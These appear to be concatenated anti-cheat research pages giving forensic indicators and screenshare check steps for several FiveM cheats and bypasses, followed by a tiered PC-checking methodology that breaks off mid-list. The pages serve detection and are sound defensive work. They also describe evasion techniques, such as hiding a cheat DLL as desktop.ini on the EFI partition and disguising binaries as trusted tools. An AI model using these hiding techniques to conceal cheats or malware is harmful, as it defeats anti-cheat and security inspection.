Artifacts · Clubhouse AC Cheat DetectionHighPublished Trigger FiveM cheat masquerade (Rechner.exe) ============================================ Trigger is a FiveM cheat distributed as Rechner.exe — the German word for “calculator.” This masquerade targets German-speaking users who might recognise the name as innocent. The binary is identified by SHA-256 7078d61d9106cea38eeee6b495051473c5ec9cbba0a6eb399f5702ba576c9f79. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Masquerades as Rechner.exe — German for “calculator.” The Windows Calculator is calc.exe, not this name. * SHA-256 7078d61d9106cea38eeee6b495051473c5ec9cbba0a6eb399f5702ba576c9f79 for definitive identification. * Prefetch and PcaSVC records persist after execution and reveal the actual file path. Overview -------- Trigger is a FiveM cheat that uses the filename Rechner.exe as a social engineering masquerade. “Rechner” is the German word for “calculator” — the intent is to appear innocuous to German-speaking users who might associate the name with a legitimate system utility. However, the legitimate Windows Calculator executable is named calc.exe (or CalculatorApp.exe in modern Windows). No legitimate Windows component uses the name Rechner.exe. The Prefetch entry will reveal the actual execution path of the file, which is typically a non-system location (Downloads, Desktop, or a cheat-specific directory) rather than C:\\Windows\\System32. Sample metadata (IOC) --------------------- Rechner.exe — file indicatorsIOC Name Rechner.exe Masquerade German "calculator" (legitimate: calc.exe) Cheat name Trigger SHA-256 7078d61d9106cea38eeee6b495051473 c5ec9cbba0a6eb399f5702ba576c9f79 Behavioral indicators --------------------- ### German-language calculator masquerade The name Rechner.exe mimics a German system utility to avoid suspicion. Key differentiators from the legitimate Windows Calculator: * Legitimate Windows Calculator: calc.exe or CalculatorApp.exe in C:\\Windows\\System32 * This cheat: Rechner.exe in a non-system path * No valid Microsoft Authenticode signature on the cheat binary ### Execution path evidence The Prefetch record will contain the full path from which Rechner.exe was executed. A path outside of C:\\Windows\\System32 immediately distinguishes this from any hypothetical legitimate use. Screenshare check guide ----------------------- 1 ### Prefetch — Rechner.exe * Check C:\\Windows\\Prefetch for RECHNER.EXE-\*.pf. * Examine the Prefetch entry's execution path. A path outside System32 confirms this is not the legitimate calculator. 2 ### File signature verification * If the file is present on disk, right-click → Properties → Digital Signatures. * The legitimate Windows Calculator is signed by Microsoft. An unsigned file or non-Microsoft signature is suspicious. 3 ### File hash verification * Compute the SHA-256 of the file. * Match against 7078d61d9106cea38eeee6b495051473c5ec9cbba0a6eb399f5702ba576c9f79. 4 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for an entry referencing Rechner.exe from a non-system path. 5 ### Browser and Discord * Check browser history and downloads for references to Trigger cheat or Rechner downloads from non-Microsoft sources. Detection summary ----------------- Artifact matrix — Trigger / Rechner.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC entry Yes AppCompat / DPS log Prefetch + execution path Usually C:\\Windows\\Prefetch SHA-256 hash Yes (file on disk) File system Missing MS signature Yes (file on disk) File properties Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Seryx FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Seryx FiveM cheat detection & forensic artifacts ================================================ Seryx is a FiveM cheat loader distributed as Loader.exe. It is identified by SHA-256 01a27b1ce601280792941524b4b108330eb2ffe3e0a0151e3ba44257c3585476 and a PcaSVC offset of 0x1c86000. Because the filename is generic, hash and PcaSVC confirmation are required for attribution. CR Clubhouse AC Research June 2, 2026 6 min read Summary * Distributed as generic Loader.exe — attribution requires hash confirmation or PcaSVC offset match. * SHA-256 01a27b1ce601280792941524b4b108330eb2ffe3e0a0151e3ba44257c3585476. * PcaSVC offset 0x1c86000 observed in memory forensics. * Prefetch and AppCompat records persist after execution. Overview -------- Seryx is a FiveM cheat loader. Like several other cheats in the FiveM ecosystem, it distributes its primary executable under the generic name Loader.exe. This means the filename alone is insufficient for attribution — hash verification and PcaSVC offset matching are the primary identification methods. The PcaSVC offset 0x1c86000 is a memory forensic indicator observed during active Seryx sessions, providing a complementary identification pathway alongside the SHA-256 hash. Sample metadata (IOC) --------------------- Loader.exe (Seryx) — file indicatorsIOC Name Loader.exe Brand Seryx SHA-256 01a27b1ce601280792941524b4b10833 0eb2ffe3e0a0151e3ba44257c3585476 PcaSVC 0x1c86000 Behavioral indicators --------------------- ### Generic filename — attribution by hash The executable name Loader.exe is shared by many FiveM cheats. When investigating a suspect Loader.exe, always confirm attribution by computing the SHA-256 hash and matching it against the known Seryx value. Alternatively, the PcaSVC offset 0x1c86000 provides a memory-side confirmation. ### PcaSVC memory offset During memory forensic analysis of a system running Seryx, the PcaSVC offset 0x1c86000 has been consistently observed. This offset combined with the executable name allows attribution even when the file has been deleted. Screenshare check guide ----------------------- 1 ### File hash verification * If Loader.exe is present on disk, compute its SHA-256. * Match against 01a27b1ce601280792941524b4b108330eb2ffe3e0a0151e3ba44257c3585476. 2 ### PcaSVC offset check * In memory forensic tools, search for PcaSVC entries at offset 0x1c86000. * This offset combined with a Loader.exe entry confirms Seryx. 3 ### Process list — Loader.exe * Check for a running Loader.exe process. Note the full executable path — non-system paths are suspicious. 4 ### AppCompat / PcaSVC log * Inspect the AppCompat database for a Loader.exe entry. Cross-reference the path and timestamp with other indicators. 5 ### Browser and Discord * Check browser history and downloads for references to Seryx. * In Discord, check **User Settings → Authorized Apps**. Detection summary ----------------- Artifact matrix — Seryx / Loader.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────── PcaSVC entry (0x1c86000) Yes AppCompat / DPS log SHA-256 hash match Yes (file on disk) File system Prefetch (Loader.exe) Usually C:\\Windows\\Prefetch Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Aorist FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Aorist FiveM cheat detection & forensic artifacts ================================================= Aorist is a FiveM-targeted cheat distributed under the executable name Aorist.exe. Execution artifacts are recorded across multiple forensic artifact sources including the Windows DPS log, PcaSvc registry hive, Prefetch directory, and on-disk visibility via the Everything tool. CR Clubhouse AC Research June 2, 2026 7 min read Summary * DPS timestamp of 2025/06/05:00:03:40 provides a cleanup-resistant first-seen marker for Aorist.exe. * PcaSvc entry 0x2d1000 independently records execution in the Windows Application Compatibility registry hive. * Prefetch records for Aorist.exe survive in C:\\Windows\\Prefetch and can be parsed to confirm execution time and path. * The Everything tool confirms on-disk presence of Aorist.exe if the file has not been deleted post-session. Overview -------- Aorist is a commercially distributed FiveM cheat loader. Its primary executable is named Aorist.exe. Unlike cheats that masquerade as legitimate software, Aorist operates under its own branded name, making the filename itself a direct indicator of compromise when found in Prefetch, DPS logs, or on disk. The cheat's execution footprint spans multiple Windows forensic artifact sources. The DPS first-seen timestamp and PcaSvc registry entry are written at initial execution and cannot be removed by the same cleanup routines that clear Prefetch or browser history, making them reliable persistence indicators for investigators. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. Aorist.exe — file indicatorsIOC Name Aorist.exe SHA-256 cc6cbfaed2bb4b124c32d71d2c581a5e70c91fcd2c7b039526e54dc89855129a SHA-1 660f98a98e6ea3534fa1c6876b298013648d43fd MD5 89b2b5712bd94be073a2d222fc45a0ce First seen 2025/06/05:00:03:40 (DPS timestamp) PcaSvc 0x2d1000 The DPS timestamp of 2025/06/05:00:03:40 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### Prefetch records Following execution, Windows creates a Prefetch entry for Aorist.exe in C:\\Windows\\Prefetch. The Prefetch file records the executable's full path, the last run time, and run count. Even if Aorist.exe is deleted from disk, the Prefetch entry persists until the Prefetch folder is manually cleared. ### On-disk visibility via Everything The Everything tool (voidtools) indexes the NTFS Master File Table and can locate Aorist.exe on disk in real time, even if the file is stored in an unusual directory. A search for Aorist.exe in Everything will reveal the full path if the binary has not been deleted. Screenshare check guide ----------------------- Work through these steps in order. Step 1 (DPS timestamp) is the most cleanup-resistant. Steps 3–5 cover Prefetch, on-disk evidence, and hash confirmation. 1 ### DPS timestamp for Aorist.exe * Use a DFIR tool to inspect the DPS log for an entry corresponding to Aorist.exe. * The expected timestamp is 2025/06/05. Any DPS entry for this executable is definitive evidence of execution and cannot be removed by standard user-side cleanup. 2 ### PcaSvc entry 0x2d1000 * Check the PcaSvc registry hive for an entry associated with Aorist.exe. * The value 0x2d1000 is the known PcaSvc flag written at execution. This entry is stored in the Application Compatibility registry and survives independent of Prefetch cleanup. 3 ### Prefetch for Aorist.exe * Check C:\\Windows\\Prefetch for an AORIST.EXE-\*.pf file. * Parse the Prefetch entry to confirm last run time and full executable path. * There is no legitimate Windows or application component named Aorist.exe, so any Prefetch entry is unambiguous. 4 ### Everything tool search for Aorist.exe * Open the Everything tool and search for Aorist.exe. * If the binary is still on disk, Everything will display the full path instantly via MFT indexing. * Note the directory — legitimate software does not ship a binary with this name. 5 ### Hash check — SHA-256 * If the file is still present, hash it and compare against the known SHA-256: * cc6cbfaed2bb4b124c32d71d2c581a5e70c91fcd2c7b039526e54dc89855129a * A match confirms this is the known Aorist sample from the research corpus. Detection summary ----------------- Artifact matrix — Aorist / Aorist.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSvc / DPS timestamp Yes AppCompat / DPS log Prefetch (Aorist.exe) Usually C:\\Windows\\Prefetch File on disk (Aorist.exe) Until deleted Everything / Explorer Hash match (SHA-256) If file present Hash utility The DPS timestamp and PcaSvc entry are the most reliable long-term indicators, persisting after the cheat exits and surviving standard cleanup. Prefetch provides corroborating execution evidence with timestamp detail. Hash matching confirms sample identity when the file is still present on disk. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # FiveM External Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished FiveM External Cheat hash-identified sample detection ===================================================== An unnamed FiveM external cheat identified by SHA-256 49C275CB04134AFC50816121930786B2D7843F055C13BAF52626CAAE4C79C321. External cheats operate from a separate process and read/write game memory without injecting into the FiveM process, leaving a distinct artifact footprint. CR Clubhouse AC Research June 2, 2026 6 min read Summary * SHA-256 49C275CB04134AFC50816121930786B2D7843F055C13BAF52626CAAE4C79C321 provides definitive binary identification. * External cheat architecture: operates as a standalone process reading game memory, visible in the process list alongside FiveM. * PcaSVC and Prefetch records persist after execution. Overview -------- This sample is an external FiveM cheat — meaning it operates as a standalone process rather than injecting code into the FiveM game process. External cheats read and write game memory through Windows APIs (e.g., ReadProcessMemory / WriteProcessMemory), leaving them visible in the process list when FiveM is running. The sample is identified solely by its SHA-256 hash, as no branded name or distinctive filename has been attributed to this build. The hash provides unambiguous binary identification when the file is available on disk. Sample metadata (IOC) --------------------- FiveM external cheat — file indicatorsIOC Type FiveM external cheat (process-based) SHA-256 49C275CB04134AFC50816121930786B2 D7843F055C13BAF52626CAAE4C79C321 Behavioral indicators --------------------- ### External process co-located with FiveM Because this is an external cheat, it will appear as a separate process in Task Manager or System Informer while FiveM is running. An unknown process with memory read permissions on FiveM\_GTAProcess.exe is a strong indicator of an external cheat. Check the handles and memory access patterns of any unfamiliar process. ### Hash-based attribution Since no branded name is associated with this sample, hash matching is the primary attribution method. The SHA-256 value can be computed from any copy of the file on disk, including copies in temporary folders or Discord download caches. Screenshare check guide ----------------------- 1 ### Process list — unknown processes alongside FiveM * With FiveM running, check System Informer for any unknown processes with handles open to FiveM\_GTAProcess.exe. * External cheats require memory access to function — any unexplained process with such access is suspicious. 2 ### File hash verification * If a suspect file is present on disk, compute its SHA-256. * Match against 49C275CB04134AFC50816121930786B2D7843F055C13BAF52626CAAE4C79C321. 3 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for entries from non-system executable paths that coincide with FiveM session times. 4 ### Prefetch records * Check C:\\Windows\\Prefetch for Prefetch entries from unusual paths executed concurrently with FiveM. 5 ### Browser and Discord * Check browser downloads and Discord cache for the source of suspect files. Detection summary ----------------- Artifact matrix — FiveM external cheatSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC entry Yes AppCompat / DPS log SHA-256 hash match Yes (file on disk) File system External process (if running) Only while running Process list / SI Prefetch record Usually C:\\Windows\\Prefetch Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Anydesk FiveM Cheat Masquerade: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Anydesk Cheat FiveM cheat masquerade detection ============================================== A FiveM cheat distributed as Anydesk.exe to impersonate the legitimate AnyDesk remote desktop application. The genuine AnyDesk binary carries a valid Authenticode signature from philandro Software GmbH; this masquerade does not. SHA-256 e7a51618ad0ad0b7bf1b8f9f1d11cd04b793cb200bfb4065f3ad6b9f9acfeb47 and PcaSVC offset 0x581000 identify the binary. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Impersonates AnyDesk — the legitimate binary is signed by philandro Software GmbH. This masquerade is unsigned. * SHA-256 e7a51618ad0ad0b7bf1b8f9f1d11cd04b793cb200bfb4065f3ad6b9f9acfeb47. * PcaSVC offset 0x581000 observed in memory forensics. * Execution path — legitimate AnyDesk runs from %AppData%\\AnyDesk or Program Files, not arbitrary user paths. Overview -------- This FiveM cheat masquerades as AnyDesk — a widely used remote desktop application — by adopting the filename Anydesk.exe. The social engineering angle relies on users or investigators dismissing the process as a routine remote support tool. Key distinguishing factors from the legitimate AnyDesk binary: * The legitimate AnyDesk executable is signed by philandro Software GmbH with a valid Authenticode certificate. * The legitimate binary installs to %AppData%\\AnyDesk\\AnyDesk.exe or C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe. * This cheat binary is unsigned and runs from an arbitrary user path. Sample metadata (IOC) --------------------- Anydesk.exe (FiveM cheat) — file indicatorsIOC Name Anydesk.exe Masquerade AnyDesk remote desktop (philandro Software GmbH) SHA-256 e7a51618ad0ad0b7bf1b8f9f1d11cd04 b793cb200bfb4065f3ad6b9f9acfeb47 PcaSVC 0x581000 Signature None (legitimate AnyDesk is signed) Behavioral indicators --------------------- ### Missing Authenticode signature The genuine AnyDesk application is signed by philandro Software GmbH. Checking the Digital Signatures tab of the Properties dialog will immediately reveal whether the binary is legitimate — an unsigned file claiming to be AnyDesk is definitively malicious. ### Execution path anomaly Legitimate AnyDesk installations run from predictable system paths. This cheat binary will be present in an unexpected location — such as the Downloads folder, Desktop, or a cheat-specific directory. The Prefetch entry will reveal the actual execution path. ### PcaSVC offset The PcaSVC offset 0x581000 has been observed in memory forensic analysis of systems running this cheat. Combined with the execution path and hash, it provides definitive attribution. Screenshare check guide ----------------------- 1 ### Digital signature verification * Locate Anydesk.exe on disk (use Everything or search). * Right-click → Properties → Digital Signatures. The genuine AnyDesk is signed by philandro Software GmbH. An unsigned file is the cheat. 2 ### Execution path check * In Prefetch or AppCompat, check the full path of the Anydesk.exe execution. * Paths outside %AppData%\\AnyDesk or Program Files are suspicious. 3 ### File hash verification * Compute the SHA-256 of the suspect file. * Match against e7a51618ad0ad0b7bf1b8f9f1d11cd04b793cb200bfb4065f3ad6b9f9acfeb47. 4 ### PcaSVC offset check * In memory forensics, check for PcaSVC entry at offset 0x581000 associated with an Anydesk.exe entry. 5 ### Browser and Discord * Check browser downloads for the source of the file. Legitimate AnyDesk is downloaded from anydesk.com — any other source is suspicious. Detection summary ----------------- Artifact matrix — Anydesk.exe FiveM cheatSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC entry (0x581000) Yes AppCompat / DPS log SHA-256 hash Yes (file on disk) File system Missing signature Yes (file on disk) File properties Prefetch + path Usually C:\\Windows\\Prefetch The most immediately actionable indicator is the **missing Authenticode signature** — the real AnyDesk is always signed by philandro Software GmbH. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Aqua TriggerBot FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Aqua TriggerBot FiveM cheat masquerade (ReShade) ================================================ Aqua TriggerBot is a FiveM triggerbot distributed as ReShade\_Setup\_6.6.1.exe to impersonate the legitimate ReShade graphics post-processing installer. The real ReShade installer is a well-known graphics tool — this masquerade exploits that reputation. SHA-256 841757e9118e0c09c3693c7d60e142535d576b558ae373d8d808501f2b3d59c9 and PcaSVC offset 0x80000 identify the binary. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Masquerades as ReShade\_Setup\_6.6.1.exe — the legitimate ReShade installer is signed by crosire; this is unsigned. * SHA-256 841757e9118e0c09c3693c7d60e142535d576b558ae373d8d808501f2b3d59c9. * PcaSVC offset 0x80000 observed in memory forensics. * Triggerbot function — registers keyboard/mouse hooks to autofire on target detection. Overview -------- Aqua TriggerBot impersonates the ReShade graphics post-processing installer — a well-known and widely trusted tool in the gaming community. By naming the cheat ReShade\_Setup\_6.6.1.exe, the author exploits the legitimacy of the ReShade brand to reduce user suspicion. The legitimate ReShade installer is signed by crosire (the author) with a valid Authenticode certificate. This cheat binary is unsigned, providing an immediate differentiator. Additionally, the authentic ReShade setup does not function as a triggerbot — the functionality is entirely different. Sample metadata (IOC) --------------------- ReShade\_Setup\_6.6.1.exe (Aqua TriggerBot) — file indicatorsIOC Name ReShade\_Setup\_6.6.1.exe Masquerade ReShade graphics installer (crosire) Brand Aqua TriggerBot Type TriggerBot / FiveM cheat SHA-256 841757e9118e0c09c3693c7d60e14253 5d576b558ae373d8d808501f2b3d59c9 PcaSVC 0x80000 Signature None (legitimate ReShade is signed) Behavioral indicators --------------------- ### ReShade masquerade The legitimate ReShade setup installer is signed by crosire. Key differentiators: * Real ReShade: signed by crosire, downloaded from reshade.me, does not register keyboard hooks. * This cheat: unsigned, may be distributed via Discord or cheat forums, registers keyboard/mouse hooks. The version number 6.6.1 in the filename may or may not correspond to any real ReShade version — investigators should not assume the version number is accurate. ### TriggerBot hook behavior As a triggerbot, Aqua registers low-level keyboard and/or mouse hooks to intercept input and inject synthetic fire commands when the crosshair is over a target. During an active session, these hooks are observable in System Informer's global hooks view. ### PcaSVC memory offset The PcaSVC offset 0x80000 has been observed in memory forensic analysis of systems running Aqua TriggerBot. This offset combined with the filename and hash provides a multi-indicator confirmation. Screenshare check guide ----------------------- 1 ### Digital signature verification * Locate ReShade\_Setup\_6.6.1.exe on disk. * Right-click → Properties → Digital Signatures. Legitimate ReShade is signed by crosire. An unsigned file is the cheat. 2 ### Download source check * Check browser downloads for the origin of the file. Legitimate ReShade is only distributed via reshade.me. Any other source is suspect. 3 ### File hash verification * Compute the SHA-256 of the file. * Match against 841757e9118e0c09c3693c7d60e142535d576b558ae373d8d808501f2b3d59c9. 4 ### System hooks * In System Informer, check the global hooks view for any hook registered by a process matching this filename. 5 ### PcaSVC offset check * In memory forensics, check for PcaSVC entry at offset 0x80000 associated with ReShade\_Setup\_6.6.1.exe. 6 ### Prefetch and AppCompat * Check C:\\Windows\\Prefetch for RESHADE\_SETUP\_6.6.1.EXE-\*.pf and confirm the execution path. Detection summary ----------------- Artifact matrix — Aqua TriggerBot / ReShade\_Setup\_6.6.1.exeSummary Artifact Survives cleanup? Check location ───────────────────────────────────────────────────────────────────────────────── PcaSVC entry (0x80000) Yes AppCompat / DPS log SHA-256 hash Yes (file on disk) File system Missing crosire signature Yes (file on disk) File properties Prefetch (ReShade\_Setup\_6.6.1.exe) Usually C:\\Windows\\Prefetch Hook registration (if running) Only while running System Informer The most immediately actionable indicator is the **missing Authenticode signature** — legitimate ReShade is always signed by crosire, and any copy of the file without this signature is definitively the cheat. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Revenge Bypass: EFI-Hidden DLL & Desktop.ini Reshade Masquerade | Clubhouse AC Research · Clubhouse AC Bypass DetectionHighPublished Revenge Bypass: EFI-Hidden DLL & Desktop.ini Reshade Masquerade =============================================================== Revenge hides its payload DLL inside the EFI system partition as a desktop.ini file — a path that Everything and most file scanners don't index by default. It mimics Reshade in the most superficial way imaginable: the name. The Star.xyz variant shares the same keyauth.win authentication backend and leaves identical forensic trails in LSASS, DNS, and the NTFS journal. FiveMBypass DetectionEFI PartitionDesktop.inikeyauth.win CR Clubhouse AC Research Jun 2, 2026 10 min read 12 evidence captures Summary * Revenge drops its DLL as desktop.ini inside the EFI System Partition — a location that Everything and most file scanners skip by default. * The Reshade masquerade is cosmetic only — name and icon, no functional Reshade code. Mount the ESP with mountvol X: /S to inspect it directly. * Star.xyz Bypass (SHA-256: ce5f6779...) shares the same keyauth.win C2 and distribution network as Revenge. * Both variants leave forensic artifacts in BAM registry, LSASS process memory, NTFS USN Journal, and LastActivityView. Overview -------- Revenge Bypass creates an EFI partition drive and hides its DLL as a desktop.ini file inside it. The EFI System Partition (ESP) is typically not assigned a drive letter and is not indexed by search tools like Everything. The developer is banking on this blind spot: standard screenshare checks and casual file scanners will never see the payload because they never look there. The Reshade masquerade is surface-level — only the name and icon are borrowed. There is no functional Reshade code inside the payload. The actual DLL is the bypass loader, renamed to exploit the trust gaming users have in the Reshade brand. The Star.xyz variant is a separate build distributed through the same channels. It uses keyauth.win as its authentication backend — the same backend Revenge contacts. Both variants create forensic artifacts in LSASS process memory, DNS queries, the NTFS USN Journal, LastActivityView execution records, and BAM registry entries. If you find one, check for the other. Revenge Bypass — EFI Partition & Desktop.ini -------------------------------------------- Windows creates an EFI System Partition on every UEFI-boot system. The ESP stores bootloaders, firmware drivers, and UEFI applications. It is not a normal data volume — Windows does not assign it a drive letter by default, and file indexing services like Everything do not scan it. To access it, you must mount it manually. ### How the EFI trick works * mountvol X: /S (run as admin) assigns a temporary drive letter to the ESP. Substituting any available letter works. * diskpart → list volume shows the ESP as a FAT32 volume labeled "SYSTEM" with no assigned letter. * Revenge drops its DLL at X:\\desktop.ini (or a subdirectory) to exploit the fact that no standard search tool indexes this path. * A genuine desktop.ini is a plain-text INI file under 1 KB, found in user folders. Any desktop.ini on the ESP with a file size in the hundreds of KB or MB range is the payload DLL. * Unmount when done: mountvol X: /D The "Reshade" name and icon on the launcher are cosmetic. The launcher exists in userspace to give the illusion of a graphics tool being installed. The real work happens when it writes the DLL to the ESP and arranges for it to be loaded at the appropriate time. Revenge bypass loader — Reshade masquerade interface ![Revenge bypass loader interface masquerading as Reshade](https://clubhouseac.shop/research/revenge/bypass-open.png) CMD — oversized desktop.ini (the hidden DLL) on the mounted ESP ![Command prompt listing the oversized desktop.ini DLL on the mounted EFI partition](https://clubhouseac.shop/research/revenge/desktop-ini.png) System Informer — svchost reaching keyauth.win ![System Informer showing svchost with a keyauth.win string](https://clubhouseac.shop/research/revenge/svchost-keyauth.png) BAM parser — Revenge bypass execution record ![BAM parser showing the Revenge bypass execution entry](https://clubhouseac.shop/research/revenge/bam-parser.png) Star.xyz Bypass — File Details & Hashes --------------------------------------- The Star.xyz Bypass is a distinct build distributed through the same network as Revenge. It shares the keyauth.win authentication backend and leaves an identical forensic footprint in LSASS, DNS cache, the NTFS USN Journal, and LastActivityView. The following sample was recovered and submitted for analysis. Star.xyz Bypass — file indicators (IOC)IOC SHA-1 9f926aac866275bb93925a9294e53dbc839e274a SHA-256 ce5f6779fdd9c32e5ad6c9dcbc77c3c80a520d1488e9c026f997790cf7ea47b4 Vhash 046066656d1565555132z13z487z30401031z12z234z1d355z Authentihash 3176b577829251d27c2e8e21df2a139450db32e7b449a0a5e825b9ad55df608b Imphash 723bc2df9b9f0460078622f163a7487c SSDEEP 49152:zL2d3EXOwF9u0OZkTCS+e8FW3ADu5LshzVFw2M1uXeUT8+HEcPnJL1aplW+eA3xU: H2hEKw8wQJhBFqEkpl/eA3x File Type Win32 EXE (PE32+ executable GUI x86-64) Compiler Microsoft Visual C/C++ 19.36.34810 (LTCG/C++) Linker Microsoft Linker 14.36.34810 Size 4.54 MB (4,759,040 bytes) C2 keyauth.win (DNS + LSASS) Star.xyz writes keyauth.win into the DNS cache and into lsass.exe memory the moment it authenticates. keyauth.win created in DNS / LSASS (1 of 2) ![keyauth.win string created in the DNS cache and LSASS process by Star.xyz](https://clubhouseac.shop/research/starxyz/keyauth-1.png) keyauth.win created in DNS / LSASS (2 of 2) ![keyauth.win string in the LSASS process for Star.xyz](https://clubhouseac.shop/research/starxyz/keyauth-2.png) LastActivityView — Star.xyz execution record ![LastActivityView execution record for the Star.xyz bypass](https://clubhouseac.shop/research/starxyz/lastactivityview.png) Journal Trace — Star.xyz DLL (1 of 2) ![USN Journal trace for the Star.xyz DLL (1 of 2)](https://clubhouseac.shop/research/starxyz/journal-trace-1.png) Journal Trace — Star.xyz DLL (2 of 2) ![USN Journal trace for the Star.xyz DLL (2 of 2)](https://clubhouseac.shop/research/starxyz/journal-trace-2.png) Everything — locating the Star.xyz files ![Everything search locating the Star.xyz files](https://clubhouseac.shop/research/starxyz/everything.png) VirusTotal — Star.xyz (SHA-256 ce5f6779…f7ea47b4) ![VirusTotal detections for the Star.xyz bypass](https://clubhouseac.shop/research/starxyz/virustotal.png) Star.xyz bypass — interface opened ![Star.xyz bypass interface opened](https://clubhouseac.shop/research/starxyz/bypass-open.png) Detection --------- Work through these steps in order. Steps 1–2 will catch most active or recently-used installs. Steps 3–5 cover machines where the user has attempted cleanup and apply to both Revenge and Star.xyz variants. 1 ### Mount and inspect the EFI partition * Run mountvol X: /S as administrator to assign a drive letter to the ESP (substitute any free letter for X). * Open File Explorer or a CMD window and navigate to X:\\. * Look for any DLL, EXE, or suspicious file. The ESP should contain only EFI\\ subdirectories with Microsoft and OEM bootloaders. * desktop.ini in this location is **not a legitimate Windows file**. Genuine desktop.ini files live in user profile folders, never in the ESP. Any such file here is the bypass DLL. * Use dir /a X:\\ to enumerate hidden files, then check file size. A real desktop.ini is under 1 KB. The payload will be hundreds of KB to several MB. * Unmount when done: mountvol X: /D 2 ### BAM Registry — Execution Evidence * Navigate to HKLM\\SYSTEM\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\ in regedit or RegistryExplorer. * Look for entries pointing to the EFI partition mount path, any path containing a Reshade-named file, or unexpected executables in user-writable directories. * BAM timestamps are stored as FILETIME values representing last execution — they survive user-side cleanup and cannot be cleared without direct registry editing. 3 ### System Informer — svchost.exe DNS / LSASS strings * Open System Informer as administrator → locate each svchost.exe → Network tab: look for keyauth.win DNS queries. * Open lsass.exe → Memory → Strings: search for keyauth.win. Presence here confirms the auth module loaded into LSASS address space. * Neither a legitimate svchost nor a clean lsass will contain any reference to keyauth.win. A single hit in either is sufficient for a positive detection. 4 ### NTFS USN Journal — DLL creation trace * Run fsutil usn readjournal C: csv > journal.csv in an elevated prompt. * Open the CSV and filter for desktop.ini entries with a FILE\_CREATE reason code. * Any desktop.ini created in a non-user-profile parent path (especially any EFI volume path) is a positive detection. * Correlate the creation timestamp with the BAM execution timestamp to build the full installation timeline. 5 ### LastActivityView * Download LastActivityView from nirsoft.net and run as administrator. * Look for execution records of the Revenge loader, any Reshade-named executable, or any file whose path includes an EFI partition mount point. * LastActivityView aggregates multiple Windows execution artifact sources, making it useful for reconstructing the timeline even after manual cleanup attempts. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # PC Checking Methods — Tiered Forensic Methodology · Clubhouse AC Tiered methodology5 tiers · 182 techniques PC Checking Methods by tier =========================== A complete methodology for PC checks (screenshares, SS) organised into five escalating tiers. Each tier covers a defined scope of artifacts, tools, and detection techniques — from a 10-minute triage that catches the obvious cleanups, all the way to forensic-grade contradiction analysis where every bypass leaves another artifact untouched. The pattern is consistent across all tiers: no single artifact tells the whole story. Cross-reference everything, build the timeline, trust the contradictions. [Tier 1\ \ Quick triage\ \ Foundation\ ----------\ \ The starting baseline. Execution artifacts, event logs, recent activity, and persistence locations every check should cover. 5–10 minutes per system, with one auto-fail condition that ends the check immediately.\ \ * Prefetch, AmCache, ShimCache, BAM, UserAssist\ * Service Checker auto-fail conditions\ * Recycle Bin, ZIP archives, USB device history\ \ Open Tier 1](https://clubhouseac.shop/research/pc-checking-methods/tier-1) [Tier 2\ \ Deep dive\ \ Advanced\ --------\ \ Beyond surface artifacts. NTFS-level reconstruction (USN journal, $LogFile, $I30 slack), execution correlation across three independent sources, automated event-log threat hunting with Hayabusa, and full timeline construction.\ \ * $MFT timestomp detection ($SI vs $FN)\ * AmCache + ShimCache + UserAssist correlation\ * Hayabusa Sigma rules across all event logs\ \ Open Tier 2](https://clubhouseac.shop/research/pc-checking-methods/tier-2) [Tier 3\ \ Memory + kernel\ \ Elite forensic\ --------------\ \ RAM acquisition, Volatility 3 process and kernel analysis, process hollowing and reflective DLL detection. The tier where memory wins arguments disk loses — confirms what's running NOW that disk evidence may have erased.\ \ * Live RAM capture + Volatility 3 plugins\ * PE-Sieve / Hollows Hunter for injection proof\ * Game-process baseline comparison + LOLDrivers cross-reference\ \ Open Tier 3](https://clubhouseac.shop/research/pc-checking-methods/tier-3) [Tier 4\ \ Court-grade DFIR\ \ Full acquisition\ ----------------\ \ Professional digital forensic incident response. Full disk imaging, write-blocked acquisition, chain of custody, super timeline reconstruction with Plaso, Autopsy + KAPE workflows. Reserved for appeals and high-stakes cases.\ \ * FTK Imager + write blockers + 